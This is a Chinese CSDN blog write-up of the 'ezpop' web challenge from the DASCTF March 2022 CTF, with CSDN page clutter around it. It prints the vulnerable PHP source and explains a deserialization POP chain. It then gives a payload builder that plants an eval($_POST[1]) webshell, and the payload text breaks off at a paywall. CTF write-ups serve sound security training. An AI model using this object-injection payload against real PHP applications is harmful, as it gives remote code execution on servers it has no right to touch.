DASCTF三月赛

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量3.1k 收藏
点赞数 3
文章标签: php 安全 http wireshark
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44687621/article/details/124084417
版权

DASCTF2022.3部分题目

Web
ezpop

题目源码如下

<?php

class crow
{
   
    public $v1;
    public $v2;

    function eval() {
   
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
   
        $this->v1->world();
    }
}

class fin
{
   
    public $f1;

    public function __destruct()
    {
   
        echo $this->f1 . '114514';
    }

    public function run()
    {
   
        ($this->f1)();
    }

    public function __call($a, $b)
    {
   
        echo $this->f1->get_flag();
    }

}

class what
{
   
    public $a;

    public function __toString()
    {
   
        $this->a->run();
        return 'hello';
    }
}
class mix
{
   
    public $m1;

    public function run()
    {
   
        ($this->m1)();
    }

    public function get_flag()
    {
   
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
   
    unserialize($_POST['cmd']);
} else {
   
    highlight_file(__FILE__);
}

将传入的参数cmd用反序列化函数进行处理,如果传入的对象是由fin类生成那么调用fin里的destuct()。函数中的echo输出流可控,尝试调用what类的toString方法,逐渐构造出pop链。

fin.__destruct => what.__toString => fin.run => crow.__invoke => fin.__call() =>mix.get_flag()

这里虽然fin类当中只有一个变量,但可以声明多个对象指向该类,从而实现利用链的构造。

payload如下

<?php
class crow
{
   
    public $v1;
}
class fin
{
   
    public $f1;
}
class what
{
   
    public $a;
}
class mix
{
   
    public $m1='?><?=eval($_POST[1]);';
}
$fin = new fin();
$b = new what();
$fin2 = new fin();
$c = new crow();
$fin3 = new fin();
$d = new mix();

$fin->f1 = $b;
$b->a = $fin2;
$fin2->f1 = $c;
$c->v1 = $fin3;
$fin3->f1 = $d
最低0.47元/天 解锁文章
一睡12点
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界-misc-恶臭的数据包
mlws1900的博客
07-21 1221
这道题坑的地方很多,去看icmp请求,发现数据包里面没有,也是看了wp才明白要去找dns,因为ping之前要先去dns解析。找到了一个post请求,114514.png(好家伙,做个ctf题目还要与时俱进)看到了pk(压缩包)和flag.txt,应该是把png弄出来分离然后解压获得flag。意思是为了安全起见,我将我最近一次ping过的网站作为我的密码设置了。做到后面卡壳了,看了wp,这个请求是看cookie值得到hint。打开压缩包,有个流量分析包,用wireshark打开。获得一个压缩包,继续找密码。.
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 336
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 854
简单题
全国农信银CTF流量分析(凯撒会分析流量吗)
yoyo_573的博客
06-30 317
流量分析,时间盲注,题目提示了凯撒密码。转换下就得到了结果。
2022DASCTF MAY 出题人挑战 misc
mumuzi的博客
05-22 2800
MAYMISC
做ctf题目的时候运行程序就会显示ImportError: cannot import name ‘flag‘ from ‘secret‘ 求大佬解答
weixin_55265137的博客
08-04 4572
做ctf题目的时候运行程序就会显示ImportError: cannot import name 'flag' from 'secret' 求大佬解答 3.8.2版本的py
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ (1).zip
12-07
DASCTF 吉林工师 欢迎来到魔法世界 ctf 真题
Ant & SVN task script
11-17
it's very article which introduece svn task work with ant script in your project.
安恒_务实的网络安全.pdf
08-15
安恒_务实的网络安全 业务安全
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比专用,可以自定义内容,批量提交等,确保速度
[华东交大第二届信息安全]Crypto-top_secret
ShangYaoPaiGu的博客
12-07 315
task.py test top_secret 0x02 解题思路 分析源码,第一部分代码: 通过两个64位的和生成公钥(N,e)(N,e)(N,e)存放到test文件中。这对公钥用来加密512串64位的随机数,也将其存放到test文件中。和题目给出,且位数较低,直接通过大数分解即可得到和然后就可以逆向出512个随机数了。再看看第二部分代码: 第二部分比较简单,通过生成一个1024位的随机数,再通过取这个数的下一个,从而生成ppp和qqq,再用ppp和qqq计算得到的公钥对进行加密,将公钥(n,e)(n,e
[羊城杯 2021]Bigrsa
weixin_45963786的博客
02-21 511
零、写在最最最前面 强到离谱的社区群:941849249 使你变强的专属平台:https://www.ctfer.vip/ [羊城杯 2021]Bigrsa 文章目录零、写在最最最前面强到离谱的社区群:941849249使你变强的专属平台:https://www.ctfer.vip/[羊城杯 2021]Bigrsa壹、直接上题目代码贰、解题思路叁、求解flag 壹、直接上题目代码 from Crypto.Util.number import * from flag import * n1 = 10383
任务二:Crypto学习
weixin_44171487的博客
05-09 5067
任务二:Crypto学习 内容: ① 掌握RSA加解密原理以及算法实现,在理解原理的过程中可以结合PPT对数论部分的相关内容进行学习。学习掌握AES加解密原理、代码实现。 ② 完成2020数字中国虎符网络安全题目的复现。 RSA 基本信息: ①RSA加密算法是一种非对称加密算法。在公开密钥加密和电子商业中被广泛使用,于1977年由在麻省理工学院工作的三人提出。 ②1973年,在英国政府通讯总...
DASCTF NOV X联合出题人2022年度积分榜争夺!Crypto Wp
mxx307的博客
12-03 819
DASCTF NOV X联合出题人2022年度积分榜争夺!Crypto Wp
DASCTF 2022.4
weixin_44687621的博客
04-25 2645
Web warmup_php 查看主页源码如下 <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; class Action{ public funct
[XNUCA2018]Warmup(考点:流量包文件提取,RSA共模攻击)
MikeCoke的博客
02-18 598
题目: from Crypto.Util.number import bytes_to_long, getPrime from random import randint from gmpy2 import powmod import sys p = getPrime(1024) q = getPrime(1024) N = p*q Phi = (p-1)*(q-1) with open("flag", 'r') as fr: flag = bytes_to_long(fr.read().strip(
shutTD的CTF之旅WEB篇(1)--某个DASCTF
shutTD的博客
09-26 870
某个不知道源头的DASCTF题个人wp
2022-01-08
m0_57291352的博客
01-08 481
长安“战疫”网络安全卫士守护 no_cry_no_can 有幸二血 from Crypto.Util.number import* from secret import flag,key assert len(key) <= 5 assert flag[:5] == b'cazy{' def can_encrypt(flag,key): block_len = len(flag) // len(key) + 1 new_key = key * block_len retur
2022dasctf x su 三月春季挑战
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战将会是一场精彩的比。我们将会为参者提供丰富多彩的挑战,让大家可以在比中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值